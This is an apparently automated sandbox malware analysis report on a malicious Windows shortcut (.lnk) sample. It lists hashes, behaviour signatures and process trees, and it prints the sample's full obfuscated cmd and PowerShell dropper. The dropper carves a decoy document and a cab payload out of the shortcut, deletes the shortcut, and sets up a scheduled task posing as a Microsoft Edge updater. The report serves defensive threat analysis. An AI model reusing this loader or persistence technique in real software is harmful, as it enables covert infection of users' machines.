Malware Analysis Report

2025-08-05 22:22

Sample ID 240611-ffxknavdpb
Target 00b6a18a47bdecbf3f97e0a9188e0080a59d87beb4002e8775b036ddee978d37
SHA256 00b6a18a47bdecbf3f97e0a9188e0080a59d87beb4002e8775b036ddee978d37
Tags
execution
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

SHA256

00b6a18a47bdecbf3f97e0a9188e0080a59d87beb4002e8775b036ddee978d37

Threat Level: Likely malicious

The file 00b6a18a47bdecbf3f97e0a9188e0080a59d87beb4002e8775b036ddee978d37 was found to be: Likely malicious.

Malicious Activity Summary

execution

Command and Scripting Interpreter: PowerShell

Deletes itself

Checks computer location settings

Drops file in Windows directory

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Creates scheduled task(s)

Suspicious use of SetWindowsHookEx

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Modifies registry class

Suspicious behavior: CmdExeWriteProcessMemorySpam

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-11 04:49

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-11 04:49

Reported

2024-06-11 04:52

Platform

win7-20240508-en

Max time kernel

118s

Max time network

126s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\00b6a18a47bdecbf3f97e0a9188e0080a59d87beb4002e8775b036ddee978d37.lnk

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Suspicious behavior: CmdExeWriteProcessMemorySpam

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\cmd.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\00b6a18a47bdecbf3f97e0a9188e0080a59d87beb4002e8775b036ddee978d37.lnk

C:\Windows\syswow64\cmd.exe

"C:\Windows\syswow64\cmd.exe" /q /c Set a4qw7afej=etodrpyswhnli && call %a4qw7afej:~5,1%%a4qw7afej:~2,1%%a4qw7afej:~8,1%%a4qw7afej:~0,1%%a4qw7afej:~4,1%%a4qw7afej:~7,1%%a4qw7afej:~9,1%%a4qw7afej:~0,1%%a4qw7afej:~11,1%%a4qw7afej:~11,1% -%a4qw7afej:~8,1%%a4qw7afej:~12,1%%a4qw7afej:~10,1%%a4qw7afej:~3,1%%a4qw7afej:~2,1%%a4qw7afej:~8,1%%a4qw7afej:~7,1%%a4qw7afej:~1,1%%a4qw7afej:~6,1%%a4qw7afej:~11,1%%a4qw7afej:~0,1% %a4qw7afej:~9,1%%a4qw7afej:~12,1%%a4qw7afej:~3,1%%a4qw7afej:~3,1%%a4qw7afej:~0,1%%a4qw7afej:~10,1% "$NiQttN1 = Get-Location;if($NiQttN1 -Match 'System32' -or $NiQttN1 -Match 'Program Files') {$NiQttN1 = 'C:\Users\Admin\AppData\Local\Temp'};$W7plh7D3zZI=@('.lnk');$urhLT9eZ3Vc = Get-ChildItem -Path $NiQttN1 -Recurse *.* -File | where {$_.extension -in $W7plh7D3zZI} | where-object {$_.length -eq 0x0210CCCC} | Select-Object -ExpandProperty FullName;$aqucL5hpsgw_ = New-Object System.IO.FileStream($urhLT9eZ3Vc, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$aqucL5hpsgw_.Seek(0x00001A0D, [System.IO.SeekOrigin]::Begin);$cqcRL0PBMTfs = New-Object byte[] 0x0000ABF6;$aqucL5hpsgw_.Read($cqcRL0PBMTfs, 0, 0x0000ABF6);$smRWm5tMSPXA = $urhLT9eZ3Vc.replace('.lnk','.hwpx');sc $smRWm5tMSPXA $cqcRL0PBMTfs -Encoding Byte;& $smRWm5tMSPXA;$aqucL5hpsgw_.Seek(0x0000C603, [System.IO.SeekOrigin]::Begin);$pyZmuKvG=New-Object byte[] 0x00000680;$aqucL5hpsgw_.Read($pyZmuKvG, 0, 0x00000680);$aqucL5hpsgw_.Close();Remove-Item -Path $urhLT9eZ3Vc -Force;$xGE_47GiT6=$env:programdata + '\MicrosoftEdge';mkdir $xGE_47GiT6;$oyYsDBuAJ=$xGE_47GiT6 + '\gewcdqa.c' + 'ab';sc $oyYsDBuAJ $pyZmuKvG -Encoding Byte;expand $oyYsDBuAJ -f:* $xGE_47GiT6;$fXoeoYo=$xGE_47GiT6 + '\parkonA.b' + 'at';&$fXoeoYo;Remove-Item -Path $oyYsDBuAJ -Force;"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -windowstyle hidden "$NiQttN1 = Get-Location;if($NiQttN1 -Match 'System32' -or $NiQttN1 -Match 'Program Files') {$NiQttN1 = 'C:\Users\Admin\AppData\Local\Temp'};$W7plh7D3zZI=@('.lnk');$urhLT9eZ3Vc = Get-ChildItem -Path $NiQttN1 -Recurse *.* -File | where {$_.extension -in $W7plh7D3zZI} | where-object {$_.length -eq 0x0210CCCC} | Select-Object -ExpandProperty FullName;$aqucL5hpsgw_ = New-Object System.IO.FileStream($urhLT9eZ3Vc, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$aqucL5hpsgw_.Seek(0x00001A0D, [System.IO.SeekOrigin]::Begin);$cqcRL0PBMTfs = New-Object byte[] 0x0000ABF6;$aqucL5hpsgw_.Read($cqcRL0PBMTfs, 0, 0x0000ABF6);$smRWm5tMSPXA = $urhLT9eZ3Vc.replace('.lnk','.hwpx');sc $smRWm5tMSPXA $cqcRL0PBMTfs -Encoding Byte;& $smRWm5tMSPXA;$aqucL5hpsgw_.Seek(0x0000C603, [System.IO.SeekOrigin]::Begin);$pyZmuKvG=New-Object byte[] 0x00000680;$aqucL5hpsgw_.Read($pyZmuKvG, 0, 0x00000680);$aqucL5hpsgw_.Close();Remove-Item -Path $urhLT9eZ3Vc -Force;$xGE_47GiT6=$env:programdata + '\MicrosoftEdge';mkdir $xGE_47GiT6;$oyYsDBuAJ=$xGE_47GiT6 + '\gewcdqa.c' + 'ab';sc $oyYsDBuAJ $pyZmuKvG -Encoding Byte;expand $oyYsDBuAJ -f:* $xGE_47GiT6;$fXoeoYo=$xGE_47GiT6 + '\parkonA.b' + 'at';&$fXoeoYo;Remove-Item -Path $oyYsDBuAJ -Force;"

Network

N/A

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-11 04:49

Reported

2024-06-11 04:52

Platform

win10v2004-20240426-en

Max time kernel

150s

Max time network

151s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\00b6a18a47bdecbf3f97e0a9188e0080a59d87beb4002e8775b036ddee978d37.lnk

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cmd.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\LOGS\DPX\setuperr.log C:\Windows\SysWOW64\expand.exe N/A
File opened for modification C:\Windows\LOGS\DPX\setupact.log C:\Windows\SysWOW64\expand.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000_Classes\Local Settings C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 740 wrote to memory of 2480 N/A C:\Windows\system32\cmd.exe C:\Windows\syswow64\cmd.exe
PID 740 wrote to memory of 2480 N/A C:\Windows\system32\cmd.exe C:\Windows\syswow64\cmd.exe
PID 740 wrote to memory of 2480 N/A C:\Windows\system32\cmd.exe C:\Windows\syswow64\cmd.exe
PID 2480 wrote to memory of 3352 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2480 wrote to memory of 3352 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2480 wrote to memory of 3352 N/A C:\Windows\syswow64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3352 wrote to memory of 3756 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\expand.exe
PID 3352 wrote to memory of 3756 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\expand.exe
PID 3352 wrote to memory of 3756 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\expand.exe
PID 3352 wrote to memory of 3872 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 3352 wrote to memory of 3872 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 3352 wrote to memory of 3872 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 3872 wrote to memory of 5092 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 3872 wrote to memory of 5092 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 3872 wrote to memory of 5092 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\00b6a18a47bdecbf3f97e0a9188e0080a59d87beb4002e8775b036ddee978d37.lnk

C:\Windows\syswow64\cmd.exe

"C:\Windows\syswow64\cmd.exe" /q /c Set a4qw7afej=etodrpyswhnli && call %a4qw7afej:~5,1%%a4qw7afej:~2,1%%a4qw7afej:~8,1%%a4qw7afej:~0,1%%a4qw7afej:~4,1%%a4qw7afej:~7,1%%a4qw7afej:~9,1%%a4qw7afej:~0,1%%a4qw7afej:~11,1%%a4qw7afej:~11,1% -%a4qw7afej:~8,1%%a4qw7afej:~12,1%%a4qw7afej:~10,1%%a4qw7afej:~3,1%%a4qw7afej:~2,1%%a4qw7afej:~8,1%%a4qw7afej:~7,1%%a4qw7afej:~1,1%%a4qw7afej:~6,1%%a4qw7afej:~11,1%%a4qw7afej:~0,1% %a4qw7afej:~9,1%%a4qw7afej:~12,1%%a4qw7afej:~3,1%%a4qw7afej:~3,1%%a4qw7afej:~0,1%%a4qw7afej:~10,1% "$NiQttN1 = Get-Location;if($NiQttN1 -Match 'System32' -or $NiQttN1 -Match 'Program Files') {$NiQttN1 = 'C:\Users\Admin\AppData\Local\Temp'};$W7plh7D3zZI=@('.lnk');$urhLT9eZ3Vc = Get-ChildItem -Path $NiQttN1 -Recurse *.* -File | where {$_.extension -in $W7plh7D3zZI} | where-object {$_.length -eq 0x0210CCCC} | Select-Object -ExpandProperty FullName;$aqucL5hpsgw_ = New-Object System.IO.FileStream($urhLT9eZ3Vc, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$aqucL5hpsgw_.Seek(0x00001A0D, [System.IO.SeekOrigin]::Begin);$cqcRL0PBMTfs = New-Object byte[] 0x0000ABF6;$aqucL5hpsgw_.Read($cqcRL0PBMTfs, 0, 0x0000ABF6);$smRWm5tMSPXA = $urhLT9eZ3Vc.replace('.lnk','.hwpx');sc $smRWm5tMSPXA $cqcRL0PBMTfs -Encoding Byte;& $smRWm5tMSPXA;$aqucL5hpsgw_.Seek(0x0000C603, [System.IO.SeekOrigin]::Begin);$pyZmuKvG=New-Object byte[] 0x00000680;$aqucL5hpsgw_.Read($pyZmuKvG, 0, 0x00000680);$aqucL5hpsgw_.Close();Remove-Item -Path $urhLT9eZ3Vc -Force;$xGE_47GiT6=$env:programdata + '\MicrosoftEdge';mkdir $xGE_47GiT6;$oyYsDBuAJ=$xGE_47GiT6 + '\gewcdqa.c' + 'ab';sc $oyYsDBuAJ $pyZmuKvG -Encoding Byte;expand $oyYsDBuAJ -f:* $xGE_47GiT6;$fXoeoYo=$xGE_47GiT6 + '\parkonA.b' + 'at';&$fXoeoYo;Remove-Item -Path $oyYsDBuAJ -Force;"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -windowstyle hidden "$NiQttN1 = Get-Location;if($NiQttN1 -Match 'System32' -or $NiQttN1 -Match 'Program Files') {$NiQttN1 = 'C:\Users\Admin\AppData\Local\Temp'};$W7plh7D3zZI=@('.lnk');$urhLT9eZ3Vc = Get-ChildItem -Path $NiQttN1 -Recurse *.* -File | where {$_.extension -in $W7plh7D3zZI} | where-object {$_.length -eq 0x0210CCCC} | Select-Object -ExpandProperty FullName;$aqucL5hpsgw_ = New-Object System.IO.FileStream($urhLT9eZ3Vc, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$aqucL5hpsgw_.Seek(0x00001A0D, [System.IO.SeekOrigin]::Begin);$cqcRL0PBMTfs = New-Object byte[] 0x0000ABF6;$aqucL5hpsgw_.Read($cqcRL0PBMTfs, 0, 0x0000ABF6);$smRWm5tMSPXA = $urhLT9eZ3Vc.replace('.lnk','.hwpx');sc $smRWm5tMSPXA $cqcRL0PBMTfs -Encoding Byte;& $smRWm5tMSPXA;$aqucL5hpsgw_.Seek(0x0000C603, [System.IO.SeekOrigin]::Begin);$pyZmuKvG=New-Object byte[] 0x00000680;$aqucL5hpsgw_.Read($pyZmuKvG, 0, 0x00000680);$aqucL5hpsgw_.Close();Remove-Item -Path $urhLT9eZ3Vc -Force;$xGE_47GiT6=$env:programdata + '\MicrosoftEdge';mkdir $xGE_47GiT6;$oyYsDBuAJ=$xGE_47GiT6 + '\gewcdqa.c' + 'ab';sc $oyYsDBuAJ $pyZmuKvG -Encoding Byte;expand $oyYsDBuAJ -f:* $xGE_47GiT6;$fXoeoYo=$xGE_47GiT6 + '\parkonA.b' + 'at';&$fXoeoYo;Remove-Item -Path $oyYsDBuAJ -Force;"

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Windows\SysWOW64\expand.exe

"C:\Windows\system32\expand.exe" C:\ProgramData\MicrosoftEdge\gewcdqa.cab -f:* C:\ProgramData\MicrosoftEdge

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\ProgramData\MicrosoftEdge\parkonA.bat""

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /sc minute /mo 13 /tn "MicrosoftEdgeEasyUpdate" /tr "cmd /q /c \"start \"Microsoft Edge Updater\" /min \"C:\ProgramData\MicrosoftEdge\parkon.bat\" &exit\"" /f

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 0.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 48.110.63.41.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 udp

Files

memory/3352-0-0x0000000074BFE000-0x0000000074BFF000-memory.dmp

memory/3352-1-0x0000000004980000-0x00000000049B6000-memory.dmp

memory/3352-2-0x0000000005080000-0x00000000056A8000-memory.dmp

memory/3352-3-0x0000000074BF0000-0x00000000753A0000-memory.dmp

memory/3352-4-0x0000000074BF0000-0x00000000753A0000-memory.dmp

memory/3352-5-0x0000000004FB0000-0x0000000004FD2000-memory.dmp

memory/3352-6-0x00000000058A0000-0x0000000005906000-memory.dmp

memory/3352-7-0x0000000005910000-0x0000000005976000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_r3ziythu.2hi.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3352-17-0x0000000005B50000-0x0000000005EA4000-memory.dmp

memory/3352-18-0x0000000005F30000-0x0000000005F4E000-memory.dmp

memory/3352-19-0x0000000005F80000-0x0000000005FCC000-memory.dmp

memory/3352-20-0x0000000006F30000-0x0000000006FC6000-memory.dmp

memory/3352-21-0x0000000006480000-0x000000000649A000-memory.dmp

memory/3352-22-0x00000000064D0000-0x00000000064F2000-memory.dmp

memory/3352-23-0x00000000077D0000-0x0000000007D74000-memory.dmp

memory/3352-24-0x0000000008400000-0x0000000008A7A000-memory.dmp

\??\c:\programdata\microsoftedge\gewcdqa.cab

MD5 bce6d6994700a3e05b4a22e3381a4d36
SHA1 6d3b8fd8c18f1daad940d3589890054fe5ff21b1
SHA256 623bda38e2790240ae31383db173ded9d295aa484f653ed4f1329174bbaf6154
SHA512 3dff495bfdb146ab244faefd7ea5944836bddf03732a2402f82b7d09cc45292a43f3188527c9099e216b50279507bfdadd0689c2bf44237a1cbea9123016558e

C:\ProgramData\MicrosoftEdge\parkonA.bat

MD5 a938e5c37311dabc48dc1d14c520b02a
SHA1 db9111dbb2eef7fb3482fa014bcea90c9b3df1f5
SHA256 fc13917afce9cae08c5aadfa35cf7b210208527e4d0a7f02d24eac82dc96460f
SHA512 a9e8e5f93dac1e72985719e6bbd612e90459d71f4a7b0848198346d031c3777ad02f4d13a38ccb05a03a317290dc3538cb3da032e53482d1718ce083d648b09e

C:\ProgramData\MicrosoftEdge\parkon.pko

MD5 f772107c865925631a56fac02f0c9631
SHA1 cdc8ee71f01c59c3362548f751ec2803b745c6bd
SHA256 e173955f4c0d266c3a108a95eeca07c88df1810b763b1b254596e40e75177894
SHA512 4efc5babb74ed98f78b6a342290c1f7645fc49c247d4eece1c2cbe6fdb25df70ce9ca78ac0929121898e180385f575f92304c3a09a8db1fcb4af43e5a4238235

C:\ProgramData\MicrosoftEdge\parkonB.pko

MD5 0d550d3c3fcc95dc191a9cb56f8d7fea
SHA1 e557278ee060b09fa227a0b9ef144e021763ecd5
SHA256 16ccd83a5c3d0e686491e7f7f650a7199d6add01c25fe587bf81b1e43575f564
SHA512 219d9f06cab7289935d1fc3476d41218b7910cce9fa9c60eda129d430b7f6d30e58a9619cfd6f93da9b1fde3c7f7d07383ecd174fcf2c98618ac75bbb804ca60

memory/3352-51-0x0000000074BF0000-0x00000000753A0000-memory.dmp